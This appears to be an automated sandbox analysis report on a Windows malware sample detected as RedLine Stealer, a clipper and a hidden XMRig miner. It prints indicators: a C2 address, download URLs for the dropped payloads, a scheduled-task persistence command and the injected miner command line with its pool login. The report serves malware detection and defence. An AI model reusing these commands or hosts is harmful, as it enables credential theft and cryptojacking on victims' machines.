Windows Analysis Report 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe

Overview

General Information

Sample Name: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Analysis ID: 553228
MD5: c7f9efb09db59923b3f96fd1ef2f0873
SHA1: 43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
SHA256: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
Tags: CoinMiner, XMRig, exe

Detection

BitCoin Miner, RedLine, Redline Clipper, SilentXMRMiner, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Redline Clipper
Yara detected SilentXMRMiner
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Yara detected BitCoin Miner
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Uses known network protocols on non-standard ports
Detected Stratum mining protocol
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc.)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Sigma detected: Suspicius Add Task From User AppData Temp
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Creates driver files
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Sample file name is different from the original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Process Tree

  • System is w10x64
  • 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe" MD5: C7F9EFB09DB59923B3F96FD1EF2F0873)
    • AppLaunch.exe (PID: 5180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • sistem.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\sistem.exe" MD5: 14A6FC2FF495BE7077B8AA7602606BB7)
        • AppLaunch.exe (PID: 7016 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • Microsoft.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft.exe" MD5: AFA47609E27DB892A6E3597A88C5645A)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6036 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 6380 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • cmd.exe (PID: 6696 cmdline: cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • services64.exe (PID: 864 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: AFA47609E27DB892A6E3597A88C5645A)
              • conhost.exe (PID: 6840 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                • cmd.exe (PID: 4608 cmdline: cmd" cmd /c taskkill /f /PID "6040 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                  • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • taskkill.exe (PID: 6532 cmdline: taskkill /f /PID "6040" MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
                • explorer.exe (PID: 4876 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: AFA47609E27DB892A6E3597A88C5645A)
    • conhost.exe (PID: 6012 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 6288 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: A5D983222C60F4DCAE743F8E34806580)
        • conhost.exe (PID: 6040 cmdline: C:\Windows\System32\conhost.exe" "/sihost64 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6924 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 MD5: AD5296B280E8F522A8A897C96BAB0E1D)

Malware Configuration

Threatname: RedLine

{"C2 url": "95.143.179.185:31334"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author
0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
(124 entries in total)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
9.2.AppLaunch.exe.400000.0.unpack | JoeSecurity_RedlineClipper | Yara detected Redline Clipper | Joe Security |
27.0.explorer.exe.140000000.6.unpack | PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 | Detects XMRIG crypto coin miners | Florian Roth |
  • 0x4d6674:$x1: xmrig.exe
  • 0x4d6560:$x2: xmrig.com
  • 0x4d6638:$x2: xmrig.com
27.0.explorer.exe.140000000.6.unpack | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth |
  • 0x457915:$s01: --cpu-priority=
  • 0x45726d:$s05: --nicehash
27.0.explorer.exe.140000000.6.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
  • 0x4617f1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
(227 entries in total)

Sigma Overview

Bitcoin Miner:

Sigma detected: Xmrig
Source: Process started; Author: Joe Security; Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6840, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , ProcessId: 4876

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started; Author: frack113; Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6036, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 6380

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Avira: detection malicious, Label: HEUR/AGEN.1145980
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe; Avira: detection malicious, Label: HEUR/AGEN.1145980
Source: C:\Users\user\AppData\Local\Temp\services64.exe; Avira: detection malicious, Label: HEUR/AGEN.1145980
Found malware configuration
Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp; Malware Configuration Extractor: RedLine {"C2 url": "95.143.179.185:31334"}
Multi AV Scanner detection for submitted file
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe; Virustotal: Detection: 34%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe; Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\services64.exe; Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\sistem.exe; Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\sistem.exe; ReversingLabs: Detection: 75%
Machine Learning detection for sample
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\sistem.exe; Joe Sandbox ML: detected

Bitcoin Miner:

Yara detected SilentXMRMiner
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
Yara detected Xmrig cryptocurrency miner
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: explorer.exe PID: 4876, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp; String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp; String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp; String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Detected Stratum mining protocol
Source: global traffic; TCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
Source: global traffic; TCP traffic: 192.168.2.4:49822 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb; source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: mine.bmpool.org
Source: C:\Windows\explorer.exe; Network Connect: 157.90.156.89 116
Uses known network protocols on non-standard ports
Source: unknown; Network traffic detected: HTTP traffic on port 49778 -> 7777
Source: unknown; Network traffic detected: HTTP traffic on port 7777 -> 49778
Source: unknown; Network traffic detected: HTTP traffic on port 49779 -> 7777
Source: unknown; Network traffic detected: HTTP traffic on port 7777 -> 49779
Source: global traffic; HTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1 | Host: 45.82.70.152:7777 | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1 | Host: 45.82.70.152:7777
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 14 Jan 2022 13:10:41 GMT | Content-Type: application/x-msdos-program | Content-Length: 3514792 | Connection: keep-alive | Last-Modified: Sun, 09 Jan 2022 11:37:55 GMT | ETag: "35a1a8-5d524a6ac8241" | Accept-Ranges: bytes | X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 14 Jan 2022 13:10:43 GMT | Content-Type: application/x-msdos-program | Content-Length: 2233856 | Connection: keep-alive | Last-Modified: Fri, 14 Jan 2022 12:21:45 GMT | ETag: "221600-5d589d8a97da5" | Accept-Ranges: bytes | X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global traffic TCP traffic: 192.168.2.4:49775 -> 95.143.179.185:31334
                  Source: global traffic TCP traffic: 192.168.2.4:49778 -> 45.82.70.152:7777
                  Source: global traffic TCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004
                  Source: AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777/cabura-cash.pw/4545.exe
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777/cabura-cash.pw/sistem.exe
                  Source: AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:77774
                  Source: AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777D8
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://forms.rea
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                  Source: conhost.exe, 00000015.00000000.751481626.00000224D5CB2000.00000004.00000020.sdmp, conhost.exe, 00000015.00000002.809219081.00000224D5CAB000.00000004.00000020.sdmp String found in binary or memory: http://go.mic4m
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
                  Source: AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmp String found in binary or memory: http://iptc.tc4xmp
                  Source: AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmp String found in binary or memory: http://ns.ado/Identq
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0A
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
